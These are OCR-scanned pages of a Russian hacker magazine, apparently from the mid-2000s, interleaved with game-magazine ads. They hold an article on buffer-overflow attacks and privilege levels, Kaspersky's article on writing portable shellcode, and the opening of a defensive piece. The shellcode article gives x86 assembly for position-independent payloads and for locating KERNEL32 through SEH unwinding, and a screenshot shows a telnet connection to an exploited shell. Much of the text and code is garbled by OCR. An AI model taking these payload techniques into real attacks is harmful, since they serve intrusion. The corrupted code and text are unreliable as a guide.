не интересуют взломщиков. Они ни- 
когда не станут целью, на которую бу- 


пущенных администратором. Это ча- 
ще всего приложения пользова- 
тельского плана (IE, почтовая прог- 
рамма, проигрыватели музыки-видео 


Характер- должны быть повышенные приви- дет направлен эксплоит. ;-). Именно поэтому настоятельно не 
ane Rapes легии, которые она и передаст ата- Следующая ступень иерархии - рекомендуется работать под учетной 
полнения в кующему, выполнив определенный "Пользователи" ("Users"). Эта группа записью с правами админа. Но, ока- 
Я he код. Вывод: наиболее желанны gna уже может входить в систему с тер- зывается, доступ админа - не самый 
пользовать взломщиков переполнения в приви- миналов, но права в ней все еще высокий в системе! Максимальными 
как локаль- легированных и распространенных очень ограниченны: нет права на за- привилегиями обладает "Система" 
ЕЕ. приложениях. Что касается распро- пись в системные сфайлы и папки. ("System") - самая желанная цель 


страненности, то OC Windows пока 
лидирует на рынке пользовательс- 
кого ПО, а *пх-системы преоблада- 
ют на серверах. Исходя из того, где 
найдена уязвимость, взломщик уже 
может представить область распро- 
странения его кода. А вот с высоки- 
ми привилегиями и правами уже 
возникают некоторые сложности. 
Для того чтобы понять, какие имен- 
но программы имеют необходимые 
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Группа "Пользователи" объединяет 
всех юзеров системы, не имеющих 
администраторских привилегий. Запу- 
щенные ими программы всегда имеют 


взломщика. Основное отличие ее от 
группы "Администраторы" - у 
"System" вообще нет ограничений на 
проводимые в ОС действия, так, нап- 


Ш Ноябрь 1988 года - время первого сетевого вируса-червя. Имен- 


но тогда мир начал осознавать всю остроту проблемы переполне- 


ния буфера. 


Ш www.securityfocus.com - самый известный сайт no IT- 
безопасности. 


Ш www.cert.org - CERT (Computer Emergensy Response Team) 
Ш www.secyritylab.ru - огромный склад как уязвимостей, так и 


эксплоитов для них 


Ш www.bugtrag.ru - наш ответ западным сайтам. 
Ш www.microsoft.com - патчи для глючной системы. 


ример, такая процедура, как смена 
пароля админа на этих учетных запи- 
сях будет существенно отличаться. 
Если у взломщика только права ag- 
мина, ему нужно будет сначала ввес- 
ти старый пароль на учетку и только 
потом установить новый; для учетной 
записи "System" вводить старый па- 
роль не нужно. "System" - аналогия 
root'a в *nix-cuctemax. Получить пра- 
ва системы намного сложнее, но все 
же реально. Главная возможность - 
использовать переполнения буфера 
в программе из нулевого кольца за- 
щиты. О кольцах защиты хочется 
рассказать несколько подробней: в 
них скрыта вся архитектура Виндов. 


ВЛАСТЕЛИН КОЛЕЦ, ИЛИ ТРИ 
СОРВАННЫЕ БАШНИ 

m Самое непривилегированное 
кольцо - третье. В нем исполняются 
программы всех пользователей 
включая админов. Это уровень при- 
ложений. ПО из этого кольца защи- 
ты никак не может влиять на более 
"высокие" программы (правда, толь- 
ко в теории, а на практике часто бы- 
вает с точностью gO наоборот ;-( ). 
Даже если программа запущена ag- 
министратором, она не может ока- 
зать какого-то определенного воз- 
действия на код даже из второго 
уровня защиты. Третий уровень 
полностью контролируется как сис- 
темой, так и приложениями из более 


ЕЙ een ee ees eee ee 
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привилегированных уровней. Затем 
идут первое и второе кольца защи- 
ты. В них выполняются общесистем- 
ные задачи и драйвера. Очень часто 
в первом кольце работают профес- 
сиональные отладчики. Достаточно 
второго уровня, чтобы можно было 
управлять всеми приложениями, за- 
пущенными на данный момент. Так 
как драйвера крутятся во втором 
уровне, то переполнение в любом 
драйвере даст, как минимум, права 
админа. И самое главное - нулевое 
кольцо защиты. Код этого уровня 
обладает максимальными привиле- 
гиями, в этом кольце работает ОС и 
отладчик 5о се. Чтобы приложение 
могло попасть в нулевое кольцо за- 
щиты, ему необходимо загружаться 
go старта ОС (именно так делает 

зо се). Поэтому заполучить приви- 
легии "System", используя ошибку в 
пользовательском ПО, не получится. 
Но если взломщик найдет перепол- 
нение в ядре ОС или в ее основных 
компонентах (как было с КРС-уязви- 
мостями), то дело - труба. Как изве- 
стно, злоумышленник получает пра- 
ва того уровня, которые есть у 
глючной программы, в случае нуле- 
вого кольца защиты он получит 
права "System". При получении сис- 
темных прав взломщика ничто не 
остановит - вот почему ошибка в 
ядре ОС сведет к нулю все защит- 
ные мероприятия. 


Очень много теории и информации к размышлению 


Вот такой файлик и вызывал переполнение в системах 
ХР SP1 


ПИНГВИНЫ, К ОБОРОНЕ 
СТАНОВИСЬ! 

m= Поговорим теперь о *пх-защите. 
Все OC *nix имеют очень схожую сис- 
тему безопасности по отношению к 
работе с пользователями. В основе 
лежат понятия группы и пользовате- 
ля. Все пользователи принадлежат к 
какой-либо группе (например, группы 
nobody, wheel, admin, root и т.д.). Эту 
принадлежность при добавлении 
пользователя устанавливает админи- 
стратор. Кроме этого, у каждого срай- 
ла есть несколько атрибутов: чтение, 
запись, выполнение; они вполне мо- 
гут быть различны для хозяина сай- 


~ Очень важ- 

ла, для группы, в которой он состоит, ЕАН 
и для всех остальных. С помощью выставить 

ы так называ- 

этих атрибутов происходит разграни емое прави- 
чение пользовательского доступа к ло "запре- 
ресурсам системы. Представленная щено все, 


что явно не 


система очень удобна и практически разрешено", 


неуязвима. Но есть еще два атрибута, эта полити- 
ка запреще- 
которые играют огромную роль при ЕЯ ая 
атаках на переполнения буфера, - так жет уберечь 
сервер от 
называемые биты UID/GID. Механизм удаленных 
SUID/SGID был введен для повыше- атак пере- 
ния безопасности и юзабильности полнения. 


ОС, но на самом деле он создал поря- 
дочную уязвимость при атаках на пе- 
реполнение буфера. Принцип работы 
этого механизма можно объяснить 
так: в системе существует множество 
файлов, которые должны быть защи- 
щены от непосредственного чтения и 
записи простыми пользователями, но 
при этом некоторые программы, запу- 
щенные ими же, могли бы писать в 
эти файлы. Примером служит файл 
/etc/passwd, в нем хранятся кеши па- 
ролей всех пользователей. Этот 
срайл защищен от чтения и записи 
для всех, кроме root'a. При обычной 
модели это бы значило, что только 
root может менять пароль для поль- 
зователя. На самом же деле это не 
так: программа passwd отлично рабо- 
тает у каждого юзера системы. Лю- 
бой пользователь может легко сме- 
нить свой пароль, а значит произвес- 
ти запись в /etc/passwd! Достигается 
это именно с помощью механизма 
SUID/SGID процессов. Дело в том, что 
программа passwd имеет хозяином 
пользователя root и у нее установ- 
лен У-бит. При запуске такого при- 
ложения любым способом процесс 
получает хозяином пользователя, ко- 
торый прописан у него во владель- 
цах. Таким образом, программа запус- у 
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В апреле 
этого года 
Microsoft 
предупреди- 
ла о новом 
Gare в IE, 
возникаю- 
щем при об- 
работке кар- 
тинок. Ка- 
ком? Читай 
статью "Пе- 
реполнения 
при обра- 
ботке дан- 
ных" в этом 
номере! 


Также хоро- 
шими целя- 
ми в *nix- 
системах 
являются 
ошибки в 
функциях 
ядра. 


ПЛАТФОРМА. OVERFLOW. ВЛАСТЬ ) 


Вот они, будни админа Виндов 


кается с максимальными привилегия- 
ми, без ввода гос{-пароля. Из концеп- 
ции механизмов SUID/SGID следует, 
что устанавливать бит UID, который 
позволяет запускать данное прило- 
жение от имени владельца срайла 
без ввода пароля на его учетную за- 
пись, и бит GID, позволяющий про- 
цессу запускаться от имени группы- 
владельца, может только root. Прог- 
раммы с установленным UID-6uToM, 
имеющие владельцем пользователя 
root, - главные мишени кракеров. 
Достаточно найти и применить пере- 
полнение буфера в таком сосрте, и 
сервер сразу перейдет в руки атакую- 
щего. Поэтому некоторые защищен- 
ные дистрибутивы стараются отка- 
заться от механизма SUID/SGID, хотя 
это и понижает удобство использова- 
ния системы. Если происходит пере- 
полнения на уровне ядра, то система 
выдает kernel panic либо происходит 
разрушение защиты хоста. 


МЕСТО ВСТРЕЧИ 
ИЗМЕНИТЬ НЕЛЬЗЯ 

и Все атаки можно разделить на две 
большие группы: локальные и уда- 
ленные. Если рассматривать перепол- 
нение буфера, то отнести его к како- 
му-пибо одному виду атак невозмож- 
но. Существуют примеры как локаль- 
ных атак, так и удаленных взломов 
через переполнение. Рассмотрим no- 
кальную атаку. Для того чтобы ее со- 
вершить, у взломщика должен быть 
либо физический доступ к хосту (мони- 
тор, клава атакуемого компьютера:-), 
либо шелл, который позволит запус- 
тить приложения. Атака такого вида 
сводится к загрузке эксплоита на 


Linux видал в гробу все переполнения Виндов 
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ПЕРВАЯ ОШИБКА ПЕРЕПОЛНЕНИЯ В СЕРВИСЕ FINGERD 


{ 
char Би [512]; 


gets(buf); 


} 


Как видишь, за эти годы практически ничего не изменилось. 


ПИ 
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Что же у нас в логах? Да лаги какие-то ;-) 


компьютер и запуску его. Но тут могут 
возникнуть некоторые подводные 
камни: запрещена запись на диск во- 
обще, то есть учетная запись подра- 
зумевает только чтение файлов опре- 
деленного типа и все. Тогда атака че- 
рез шелл отпадает, а при физическом 
доступе можно попробовать исполь- 
зовать сменные носители и запускать 
эксплоит с них. Хотя и тут бывают оп- 
ределенные заморочки: у *nix-cucTem 
есть защита от подобных действий, 
основанная на том, что сменные носи- 
тели монтируются с опцией "поехес", 
что означает невозможность запуска 
программного кода с этих устройств. 
При таких жестких ограничениях 
просто использовать переполнение 
буфера не удастся, переполнение ста- 
нет частью комплексной атаки. 

В Windows также могут появиться 
проблемы при попытке взлома. Для 
локальных эксплоитов наибольшую 
проблему представляет запрещение 
выполнения любого постороннего ПО 
на данной машине. Это осуществляет- 
ся грамотным системным администра- 


ДОПОЛНИТЕЛЬНАЯ ИНФА 


тором через разрешение выполнять 
только определенный код. Чаще все- 
го такую защиту обойти не удается: 
для определения допустимых прило- 
жений используется сложная хеш- 
функция, и, если хеш не совпадет, 
приложение запущено не будет. Это 
основное препятствие при локальном 
взломе через переполнение. 


ПОЖЕЛАЙ МНЕ КОННЕКТА... 

m Если говорить о сетевых атаках, 
то тут тоже очень много общего. 
Принцип работы любого удаленного 
эксплоита достаточно прост: програм- 
ма подсоединяется на определенный 
порт атакуемой системы, посылает 
строку, переполняющую буфер сер- 
виса, а определенный код, посланный 
эксплоитом, открывает на любом сво- 
бодном порту telnet-cepBep. После че- 
го взломщик простым {епе-клиентом 
управляет удаленной системой. Прав- 
да, так красиво все только в теории, 
реальность же оказывается намного 
сложнее. Например, система Firewall 
способна разрушить все планы атаку- 


Ш Автор сетевого червя Роберт Моррис-младший - сын известного 


Т-специалиста Роберта Морриса-старшего, который занимал 
должность руководителя NCSC (Национального центра компьютер- 


ной безопасности). 
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ющего. Дело в том, что грамотно наст- 
роенный брандмауэр просто не даст 
открыть порт для неизвестного при- 
ложения. В Linux'e iptables имеет на- 
бор правил и политик, исходя из кото- 
рых он управляет всей сетевой актив- 
ностью хоста. А так как серверной 
части эксплоита в этих правилах нет, 
то он и не сможет открыть порт для 
соединения. В Windows-nnatcpopme 
брандмауэр также играет одну из ос- 
новных ролей в защите от удаленных 
атак переполнения буфера. 


КАК ЖЕ БЫТЬ? 

Полностью защититься от атак 
на переполнения невозможно, но 
снизить опасность достаточно прос- 
то. Для этого нужно следовать прос- 
тым рекомендациям. Во-первых, каж- 
дый день посещать сайт 

или ‚ где публи- 
куются самые последние новости из 
мира !Т-безопасности. Можно подпи- 
саться на рассылку с по- 
мощью сервиса или 
прямо на этом сайте. Также необхо- 


димо проверить все правила адми- 
нистрирования серверов. Для 
МИпаом/5-платформ желательно поп- 
равить правила на вкладке "админи- 
стрирование" и пункт "локальная 
политика безопасности", где следует 
явно указать ПО, которому разре- 
шен запуск на выполнение, после 
чего запретить все остальные на 
уровне хоста. Для *nix платформ 
можно при установке выбрать мак- 
симальный уровень безопасности 
(это значительно повысит безопас- 
ность системы, правда, в ущерб 
удобству работы), после установки 
использовать опцию "поехес", когда 
возникнет необходимость обратить- 
ся к сменному носителю (опцию 
можно указать в файле /etc/fstab). 
А просмотр логов в любой ОС позво- 
лит во время определить попытку 
атаки и предупредить ее, поэтому 
необходимо иногда анализировать 
системные журналы соответствую- 
щими утилитами. Постарайся cnego- 
вать нехитрым рекомендациям и 
обезопась свою систему. МЕ 


Система Firewall способна разрушить 
все планы атакующего. 


:\\ WINNT \system32\\cmd.exe 


Microsoft Windows 2000 [Версия 5.00.2195] 
€C> Корпорация Майкрософт, 


C:\>telnet 12.1 -42.129 36553 


1985-2000. 
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Pe Правильная комплектация 


ee | Правильная цена 
РУБЛЕЙ 


Никакого мусора и невнятных тем, 


настоящий геймерский рай 
ТОЛЬКО РС ИГРЫ 


Это лето — время отличных RTS. 
Ground Control 2 — еще один страте- 
гический хит на нашей обложке! 


Новое о лучших отечественных 
проектах — You Are Empty, 
S.T.A.L.K.E.R., Корсары Пи других! 


По многочисленным просьбам — 
возрождение «Дневников разра- 
ботчиков» и «Отсебятины», новые 
рубрики. 

Хочешь знать все о компьютерных 
играх — читай правильный журнал, 
читай «РС ИГРЫ»! 


84 номер уже в продаже! 


(game) 
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Крис Касперски aka мыщьх 


ЖИВУЧИЙ КОЛ 


ЖИВУЧИЙ КОД 


ТЕХНИКА НАПИСАНИЯ ПЕРЕНОСИМОГО $НЕЦ--КОДА 


$ е!-код никогда заранее не знает, куда попадет, поэтому он должен уметь выживать в любых условиях, 
автоматически адаптируясь к конкретной операционной системе, что не так-то просто. Немногие выжившие дали 
миру киберпространства то, в чем нуждались десятки червей, вирусов и их создателей. 


словимся называть Ne- 


реносимым $Пе!-кодом 


машинный код, поддер- 


Shell-Kog - 
это машин- 
ный код, 
тесно свя- 
занный с 
особеннос- 
тями атаку- 
емой систе- 
мы. 


Некоторые 
уподобляют 
переноси- 
мый Shell- 
код морской 
свинке - не 
сказать, что 
морская, и 
вроде не 
свинка :). 


живающий заданную 
линейку операционных 
систем (например, Windows МТ, 
Windows 2000 и Windows ХР). Как no- 
казывает практика, для решения по- 
давляющего большинства задач та- 
кой степени переносимости вполне 
достаточно. В конце концов, гораздо 
проще написать десяток узкоспециа- 
лизированных $Ве!-кодов, чем один 
универсальный. Что поделаешь, пере- 
носимость требует жертв и, в первую 
очередь, увеличения объема shell-Ko- 
да, а потому она оправдывает себя 
только в исключительных случаях. 


ТРЕБОВАНИЯ, 
ПРЕДЬЯВЛЯЕМЫЕ К 
ПЕРЕНОСИМОМУ ЗНЕЦ.-КОДУ 

ш Переносимый shell-kog должен 
полностью сохранять работоспособ- 
ность при любом расположении в па- 
мяти и использовать минимум систем- 
но-зависимых служебных структур, 
закладываясь лишь на наименее из- 
менчивые и наиболее документиро- 
ванные из них. 

Отталкиваться от содержимого реги- 
стров ЦП на момент возникновения 
переполнения категорически недо- 
пустимо, поскольку их значения в об- 
щем случае неопределенны, и ре- 
шиться на такой шаг можно только с 
ronogyxu, когда shell-Kog упрямо не 
желает вмещаться в отведенное ему 
количество байт и приходится импро- 
визировать, принося в жертву пере- 
НОСИМОСТЬ. 

Не стоит злоупотреблять хитрыми 
трюками ("хаками") и недокументиро- 
ванными возможностями - это нега- 
тивно сказывается на переносимости 
и фактически ничего не дает взамен. 


ПУТИ ДОСТИЖЕНИЯ 
МОБИЛЬНОСТИ 

m Техника создания перемещаемого 
кода тесно связана с архитектурой 
конкретного микропроцессора. В част- 
ности, линейка х86 поддерживает 
следующие относительные команды: 
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PUSH/POP, CALL и Jx. Старушка 
PDP-11 B этом отношении была намно- 
го богаче и, что самое приятное, поз- 
воляла использовать регистр указа- 
теля команда в адресных выражениях, 
существенно упрощая нашу задачу. 
Но, к сожалению, мы не располагаем 
возможностью выбора процессора. 

Команды условного перехода Jxx 
всегда относительны, то есть операнд 
команды задает отнюдь не целевой 
адрес, а разницу между целевым ад- 
ресом и адресом следующей команды, 
благодаря чему переход полностью 
перемещаем. Поддерживаются два 
типа операндов: byte и word/dword, 
оба знаковые - переход может быть 
направлен как "вперед", так и "назад" 
(в последнем случае операнд стано- 
вится отрицательным). 

Команды безусловного перехода 
УМР бывают и абсолютными, и отно- 
сительными. Относительные начина- 
ются с опкода EBh (операнд типа byte) 
или E9h (операнд типа word/dword), а 
абсолютные - с EAh, при этом операнд 
записывается в сорме сегмент: сме- 
щение. Существуют еще и косвенные 
команды, передающие управление по 
указателю, лежащему по абсолютно- 
му адресу или регистру. Последнее 
наиболее удобно и осуществляется 
приблизительно так: Mov eax, абсо- 
лютный agpec/jmp eax. 

Команда вызова подпрограммы 
CALL ведет себя аналогично МР, 3a 
тем лишь исключением что кодирует- 
ся другими опкодами (E8h - относи- 
тельный операнд типа word/dword, 
FFh /2 - косвенный вызов) и перед пе- 
редачей управления на целевой адрес 
забрасывает на верхушку стека адрес 
возврата, представляющий собой ag- 
рес команды, следующей за Call. 

При условии, что shell-kog pacnono- 
жен в стеке (при переполнении авто- 
матических буферов он оказывается 
именно там), мы можем использовать 
регистр ESP в качестве базы, однако 
текущее значение ESP должно быть 
известно, а известно оно далеко не 
всегда. Для определения текущего 
значения регистра указателя команд 
достаточно сделать пеаг са! и выта- 


щить адрес возврата командой рор. 
Обычно это выглядит так: 


00000000: call 000000005 
; закинуть ElP+sizeof(call) в стек 
00000005: рор ebp 

; теперь в регистре ebp текущий eip 


Приведенный код не свободен от ну- 
лей (а нули в shell-Koge в большин- 
стве случаев недопустимы), и, чтобы 
от них избавиться, Call необходимо пе- 
ренаправить "назад": 


; короткий прыжок Ha Call 
00000000: jmps 000000006 

; ебр содержит адрес, следующий за call 
00000002: рор ebp 

; актуальный Shell-KOg: 

00000003: пор 

00000004: пор 

00000005: пор 

; закинуть адрес следующей команды в 
стек 
00000006: call 


000000002 


ЖЕСТКАЯ ПРИВЯЗКА 

m Нет ничего проще вызова API- 
функции по абсолютным адресам. 
Выбрав функцию (пусть это будет 
GetCurrentThreadld, экспортируемая 
KERNEL32.DLL), мы пропускам ее че- 
рез утилиту dumpbin, входящую в 
комплект поставки практически любо- 
го компилятора. Узнав RVA (Relative 
Virtual Address - относительный вир- 
туальный адрес) нашей подопечной, 
мы складываем его с базовым agpe- 
сом загрузки, сообщаемым тем же 
dumpbin'om, получая в результате аб- 
солютный адрес функции. 


На моей машине абсолютный адрес 
срункции GetCurrentThreadid равен 
77E876Aih, но в других версиях 
Windows МТ он наверняка будет иным. 
Зато ее вызов свободно укладывает- 
ся всего в две строки, соответствую- 
щие следующим семи байтам: 


00000000: mov eax,0077E86A1 
00000005: call eax 


заре о. её SEXRPORTS RERNELS2. DLL > REBHELS2. ФТ 
Stype KERHELSZ.TXT | HOKE 


SPaingl hint BVA hae 

270 105 OD007TRD2 GetCurrent Proecaastd 
271 LOE DO00TGAD GatCurrentThresad 
272 1OF OOF076AL GetCurrent ThreadTd 
2T3 110 ODO01LTCE? Get tateFormata 

274 ТЕ 0001218 Gacbatafornatl 


Sdimpbif.@we / HEADERS FEENELZ2. DLL > REBHELZ2. ТИТ 
Seype EERMELS2.TXT | MORE 
OPTIGHAL HEADER VALUES 
LOB magic 8 
5.22 Linker fersieon 
SOOO gate of code 
SEO size of LHltialized data 
O site of whinitialingd data 
ВТО EVA of @ntry point 
1000 base of cede 
SA000 Базе of data 
TIEGO000 image bane 
LODO paecticn alilgnasnt 
200 file alignesnt 


СИСТЕМНЫЕ ВЫЗОВЫ UNIX 


Теперь попробуем вызвать функ- 
цию connect, экспортируемую 
ws2_32.dll. Пропускаем ws2_32.dll че- 
рез dumpbin и... Стоп! А кто нам вооб- 
ще обещал, что эта динамическая 
библиотека окажется в памяти? А ес- 
ли даже и окажется, TO не факт, что 
базовый адрес, прописанный в ее за- 
головке, совпадает с реальным базо- 
вым адресом загрузки. Ведь динами- 
ческих библиотек много, и, если этот 
адрес уже занят, операционная систе- 
ма загрузит библиотеку в другой реги- 
он памяти. 

Лишь две динамические библиотеки 
гарантируют свое присутствие в ag- 
ресном пространстве любого процес- 
са, всегда загружаясь по одним и тем 
же адресам (базовый адрес загрузки 
этих динамических библиотек постоя- 
нен для данной версии операционной 
системы). Это KERNEL32.DLL и 
NTDLL.DLL. Функции, экспортируемые 
остальными библиотеками, правильно 
вызывать так: 


Таким образом, задача вызова про- 
извольной функции сводится к поис- 
ку адресов функций LoadLibraryA и 
GetProcAddress. 


АРТОБСТРЕЛ ПРЯМОГО 
ПОИСКА В ПАМЯТИ 

Наиболее универсальный, перено- 
симый и надежный способ определе- 
ния адресов АР|-функций сводится к 
поиску в адресном пространстве про- 
цесса РЕ-сигнатуры нужного модуля с 
последующим разбором его таблицы 
экспорта. 

Устанавливаем указатель на 
COOOOO0O0Oh (верхняя граница поль- 
зовательского пространства для 
Windows 2000 Advanced Server и 
Datacenter Server, запущенных с заг- 
рузочным параметром /3GB) или на 
80000000h (верхняя граница поль- 
зовательского пространства всех ос- 
тальных систем). 

Проверяем доступность указателя 
вызовом функции ISBadReadPrt, экс- 
портируемой KERNEL32.DLL, или уста- 
навливаем свой обработчик структур- 
ных исключений для предотвращения 
краха системы. Если здесь лежит 
"MZ", увеличиваем указатель на 3Ch 
байта, извлекая двойное слово 
e_lfanew, содержащее смещение PE- 
сигнатуры. Если эта сигнатура 
действительно обнаруживается, базо- 
вый адрес загрузки динамического 
модуля найден и можно приступать к 
разбору таблицы экспорта, из которо- 
го требуется вытащить адреса ‹функ- 
ций LoadLibraryA и GetProcAddress 
(зная их, мы узнаем и все остальное). 
Если хотя бы одно из этих условий не 
выполняется, уменьшаем указатель 
на 10000h и все повторяем сначала 
(базовые адреса загрузки всегда 
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Компилято- 
ров shell- 
кода не су- 
ществует 
хотя бы 
уже потому, 
что не су- 
ществует 
адекватных 
языков его 
описания, 
что вынуж- 
дает нас 
прибегать к 
ассемблеру 
и машинно- 
му коду, ко- 
торые у 
каждого 
процессора 
свои. 


Создать 
shell-Kog, 
поддержи- 
вающий де- 
сяток-дру- 
гой попу- 
лярных 
осей, впол- 
не возмож- 
но, но его 
размеры 
превысят 
все допус- 
тимые ли- 
миты. 
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РЕАЛИЗАЦИЯ 


ЖИВУЧИЙ КОД) 


ЧНОЙ РАЗБОР ТАБЛИЦЫ ЭКСПОРТА 


жесткая привязка да да нет ga 
поиск в памяти да ga ga HeT 
анализ РЕВ да нет частично ga 
раскрутка SEH ga ga ga ga 
native API ga не совсем нет нет 


кратны 1000ОВ, поэтому этот прием 
вполне законен). 


Разбор таблицы экспорта осущес- 
твляется приблизительно так, как на 
врезке (пример выдран из червя 
BlackHat, полный исходный текст мож- 
но найти на сайте i 


Главный недостаток этого способа - 
в его чрезмерной громозодкости, ведь 
объем °Пе!-кода ограничен, но, к со- 
жалению, ничего лучшего пока не 
придумали. Поиск базового адреса 
можно и оптимизировать (что мы сей- 
час продемонстрируем), но от разбора 
экспорта никуда не уйти. Это дань, 
выплачиваемая за мобильность. 


огонь ПРЯМОЙ 
НАВОДКОЙ - РЕВ 

Из всех способов определения ба- 
зового адреса наибольшей популяр- 
ностью пользуется анализ РЕВ 
(Process Environment Block - блок окру- 
жения процесса) - служебной структу- 


ХАКЕРСПЕЦ 
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ры данных, содержащей, кроме про- 


Нет ничего проще вызова 
АР!-сфункции по абсолютным адресам. 


чей полезной информации, базовые 
адреса всех загруженных модулей. 

Эта популярность необъяснима и не- 
заслужена. Ведь РЕВ - это внутренняя 
кухня операционной CucTeMbI Windows 
МТ, которой ни документация, ни 
включаемые сфрайлы делиться не со- 
бираются, и лишь Microsoft Kernel 
Debugger обнаруживает обрывки ин- 
формации. Подобная недокументиро- 
ванность не может не настораживать. 
В любой из последующих версий 
Windows структура РЕВ может изме- 
ниться, как это уже неоднократно 
происходило, и тогда данный прием 
перестанет работать, а работает он, 
кстати говоря, только в МТ. Линейка 
9х отдыхает. 

Так что задумайтесь: а так ли вам ну- 
жен этот РЕВ? Единственное его goc- 
тоинство - предельно компактный код: 


РАСКРУТКА СТЕКА . 
СТРУКТУРНЫХ ИСКЛЮЧЕНИЙ 

Обработчик структурных исключе- 
ний, назначаемый операционной сис- 
темой по умолчанию, указывает на 
функцию KERNEL32!_except_handler3. 
Выяснив ее адрес, мы определим по- 
ложение одной из ячеек, гарантиро- 
ванно принадлежащей модулю КЕБ- 
NEL32.DLL. Останется округлить ее, 
адрес до величины, кратной 1.0000h, 
и заняться поисками РЕ-сигнатуры по 
методике, изложенной выше, с той 
лишь разницей, что проверять 9д0с- 
тупность указателя перед обращени- 
ем к нему не нужно, так как теперь он 
заведомо доступен. 

Практически все приложения ис- 
пользуют свои обработчики структур- 
ных исключений, и потому текущий 
обработчик не совпадает с назначен- 
ным операционной системой, а shell- 
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коду потребуется раскрутить цепочку 
обработчиков, добравшись go самого 
конца. Последний элемент списка и 
будет содержать адрес 
KERNEL32!_except_handler3. 

Достоинство этого приема в том, что 
он использует только документиро- 
ванные свойства операционной систе- 
мы, работая на всех ОС семейства 
Windows исключая, разумеется, 
Windows 3.x, где все не так. К тому же, 
он довольно компактен. 


Определение базового адреса 
KERNEL32.DLL через SEH, возвращаемом в 
регистре ЕАХ 


00000000: mov eax,fs:[00000] 
; текущ. EXCEPTION_REGISTRATION 
00000005: inc eax 

‚ если eax был 1, станет 0 
00000006: dec еах 

‚ откат на прежний указатель 
00000007: mov — esi,eax 

‚ esi Ha EXCEPTION_REGISTRATION 
00000009: mov  еах/[еах] 
 EXCEPTION_REGISTRATION. prev 
0000000B: inc eax 

‚ если eax был 1, станет 0 
0000000С: пе 000000006 

; если не нуль, разматываем дальше 
0000000Е: 10454 

‚ пропускаем prev 

0000000Е: 10459 

‚ извлекаем handler 

00000010: хог ах,ах 

‚ выравниваем на 64 Кб 

00000013: + jmps 00000001А 

; прыгаем в тело цикла 

00000015: sub  еах,000010000 
; спускаемся на 64 Кб вниз 


0000001А: стр w,feax],05A4D 
‚ это "MZ"? 
0000007: пе 000000015; если не 


"MZ", продолжаем мотать 

00000021: mov — ebx,[eax+3Ch] 
‚ извлекаем указатель Ha PE 
00000024: cmp  [еах+еБх],45508 
‚ Это. "РЕ"? 

00000028: ле 000000015 

‚ если не "РЕ", продолжаем мотать 


_ вы ыы сывыш 
NATIVE API, 
ИЛИ ПОРТРЕТ В СТИЛЕ НЮ 

и Высшим пилотажем хакерства 
считается использование сырого 
API ("native API") операционной сис- 
темы. Но, Ha мой взгляд, это лишние 
извращения. Mano того, что native 
АР!-функции полностью недокумен- 
тированы и подвержены постоян- 
ным изменениям, так они еще и неп- 
ригодны к непосредственному упот- 
реблению (поэтому и называются 
"сырыми"). Это полуфабрикаты, реа- 
лизующие низкоуровневые прими- 
тивы (primitive), своеобразные стро- 
ительные кирпичики, требующие 
большого объема сцепляющего ко- 
да, конкретные примеры реализации 
которого можно найти в NTDLL.DLL 
и KERNEL32.DLL. 

В Windows МТ доступ к native API- 
функциям осуществляется через пре- 
рывание INT 2Eh. В регистр ЕАХ зано- 
сится номер прерывания, ав EDX - ag- 
рес параметрического блока с аргу- 
ментами. В Windows XP для этой же 
цели используется машинная коман- 
да sysenter, но все свойства прерыва- 
ния INT 2Eh полностью сохранены, BO 
всяком случае пока. 

Подробное изложение техники вы- 
зова функций native API на русском 
языке, в частности, можно найти 
здесь: http://www.wasm.ru/docs/3/gloomy.zip. 


ЗАКЛЮЧЕНИЕ 

m В непрерывно изменяющемся 
мире киберпространства получен- 
ные знания и навыки устаревают не- 
обычайно быстро, и потому предло- 
женные приемы спустя некоторое 
время перестанут работать. Впро- 
чем, когда это произойдет, хакеры 
придумают новые :). 

Не воспринимай данную статью как 
gormy! Это уже отработанный материал. 
Устреми свой взгляд в мутную пелену 
будущего. Что ты видишь там? Какие 
идеи мелькают в твоей голове? Чего ты 
ждешь? Ведь если ты не додумаешься, 
то кто тогда? Так дерзай же! 
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НА ОБЛОЖКЕ 


С a -4 ow 
wALUOTAM 
оказался одной из 
лучших отечественных 
ролевых киберпанк-игр 


ТЕМА НОМЕРА 


страсти _ 
по онлаину 
К выходу готовится целая 


охапка громких онлайновых 
ролевых проектов 


Гарри VS 
Гарретг 
Герои очередных серий Thief 


и Harry Potter разобрались 
как мужчина с мужчиной 


ыы 

газрезай 

: neal 
я вБластвуи 
Самцу веками приходится 
защищать свою территорию 
от посягательств. Реализо- 
вать свои древние инстинк- 
ты может любой мужчина, 
умеющий играть в «ножички». 


CK 


= 
о 
— 
L 
ш 
> 
о 
ex 
ш 
ь. 
i 
> 
rs) 


ЗАЩИТИСЬИ ЗАМЕТИ! ) 


оваленко Дмитрий aka Ingrem (ingrem@list 


ЗАЩИТИСЬ И ЗАМЕТИ: 


ЗАЩИТА ОТ ЭКСПЛОИТОВ И ЗАКРЫТИЕ УЯЗВИМОСТЕЙ 
ПОСЛЕ АТАКИ 


ак защититься от атак на переполнение буфера? А как заюзать уязвимость и сразу же ее закрыть? Давай 
поговорим о методах защиты и попробуем пропатчить уязвимость на конкретном примере. 


ЧАСТЬ 1. 


ЗАЩИТИ СЕБЯ САМ 


Автомати- 
ческий 
контроль 
переполне- 
ния масси- 
вов есть ив 
других ком- 
пиляторах 
С++, напри- 
мер, в 
Сотрад С 
или сс из 
Alpha Linux. 


Для безо- 
пасности 
вместо 
функций 
strcpy, gets, 
sprintf B 
программе 
лучше ис- 
пользовать 
их безопас- 
ные аналоги - 


snprintf. 


СОПРОТИВЛЕНИЕ 
БЕСПОЛЕЗНО? 

m= Прочитав предыдущие статьи, ты 
мог решить, что защититься от атак 
на переполнение буфера невозмож- 
но. Кругом злые хакеры, которые все 
равно что-то найдут и переполнят. И 
при этом если не получат полный 
контроль, то уж DOS точно устроят! 
Действительно, если ты простой 
пользователь, то тебе только и оста- 
ется, что читать бюллетени безопас- 
ности и ждать заплатки, которая зак- 
роет очередную дыру в твоем софте. 

Но вот если ты программист, то 
вполне можешь защитить свою прог- 
рамму от атак на переполнение Oycpe- 
ра еще на этапе разработки. Для это- 
го нужно так скорректировать исход- 
ный код программы, чтобы каждый 
раз при записи данных в буфер про- 
верялась их длина. И совсем неваж- 
но, где именно находится сам буфер - 
в куче, в стеке или в секции данных. 
Как такая проверка делается на прак- 
тике? Как раз об этом, а также о неко- 
торых других методах защиты прог- 
рамм мы и поговорим в первой части 
статьи. 


НАСТРОИТЬ КОМПИЛЯТОРЫ! 

m А знаешь ли ты, что многие совре- 
менные НИ -компиляторы поддержи- 
вают автоматический контроль пере- 
